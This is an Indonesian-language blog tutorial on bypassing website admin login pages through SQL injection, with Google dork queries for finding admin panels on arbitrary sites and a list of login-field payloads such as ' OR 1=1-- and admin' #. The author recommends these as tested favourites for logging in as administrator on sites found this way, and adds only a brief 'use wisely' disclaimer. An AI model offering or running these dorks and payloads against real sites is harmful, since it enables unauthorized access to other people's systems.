Sebelum kita mulai tutorial bypass Admin lebih baik mengetahui apa dan kenapa penyebab terjadinya bypass admin pada sebuah situs. Singkatnya situs dapat di bypass halaman admin login tersebut dikarenakan situs tersebut memiliki bug yang bernama SQL Injection. Bug ini pernah saya posting tetapi dengan dimana attacker menggunakan cara/konsep yang berbeda memanfaatkan bug tersebut. Untuk selebih nya silahkan baca penjelasan mengenai SQL Injection di bawah ini :
#Penjelasan SQL Injection#
Injeksi SQL atau SQL Injection memiliki makna dan arti yaitu sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain. (Wikipedia).
Nah, Bypass Admin itu sendiri merupakan salah satu contoh dari bug SQL Injection, Di mana attacker memanfaatkan celah tersebut dengan cara mengisi sebuah form login yang kita injeksi menggunakan cheat sheet maka halaman administrator sebuah website dapat kita akses
Jika sudah membaca penjelasan tentang SQL Injection maka langsung saja kita kepertanyaannya, bagaimana sih caranya bypass Admin Login tersebut? ini caranya.
- Internet + Browser (Chrome direkomendasikan)
- Google Dorking untuk mencari Website Halaman Admin Login
- Username dan Password (Cheat Sheet)
#Google Dork#
- inurl:manager intitle:Admin Panel
- inurl:/admin2/ ext:php inurk:/admin/ ext:php
- inurl:/adminpanel/ ext:php
- inurl:/admin_panel/
- inurl:/login.php
- inurl:/admin.php
- inurl:/admin
- inurl:/login.html
- dan Kreasikam Lagi
Asumsikan jika kita sudah mendapatkan website untuk di bypass, misal
http://target.com/
Jangan lupa untuk menuju halaman Admin Login tersebut, misal folder directory Admin Login situs tersebut adalah "admin" maka kita menuju url tersebut yaitu
http://target.com/admin/
(Tidak semua nama folder directory Admin Login itu sama pada sebuah situs)
Contoh gambar 1
Pada form username dan password kita isi dengan:
Username : ' OR 1=1--
Password : ' OR 1=1--
Lalu Login/Enter
Contoh gambar 2
Jika berhasil maka anda akan menuju Dashboard Halaman Admin tersebut login sebagai Administrator.
Contoh gambar 3
Nah gambar yang di atas adalah merupakan hasil dari bypass Admin tersebut.
Sebenarnya ada banyak sekali Cheat Sheet untuk mengisi username dan password Admin Login, tidak hanya itu saja. Kadang ada beberapa situs yang tidak terinjeksi menggunakan
' OR 1=1-- atau sebaliknya
Jadi jika username/password tidak berhasil saya rekomendasikan untuk menggunakan yang lain, diantaranya yaitu:
' or 1=1 limit 1 -- -+
admin' #
admin@email.com' or 1=1 limit 1 -- -+
Di atas ini adalah yang paling saya rekomendasikan karena sudah sering saya gunakan berulang kali, tapi jika ingin menggunakan yang lain bisa mencari di google.
Akhirnya selesai juga Tutorial Bypass Halaman Admin Login yang saya buat, semoga bermanfaat untuk kalian semua. Harap agar menggunakan celah tersebut dengan bijak, semoga tidak disalahgunakan karena ini hanya untuk mengingatkan kita bersama-sama betapa pentingnya keamanan sebuah situs. Terima Kasih
Catatan : Tidak semua Admin Login dapat diinjeksi/bypass, karena belum tentu situs tersebut memiliki bug SQL Injection.
0
komentar
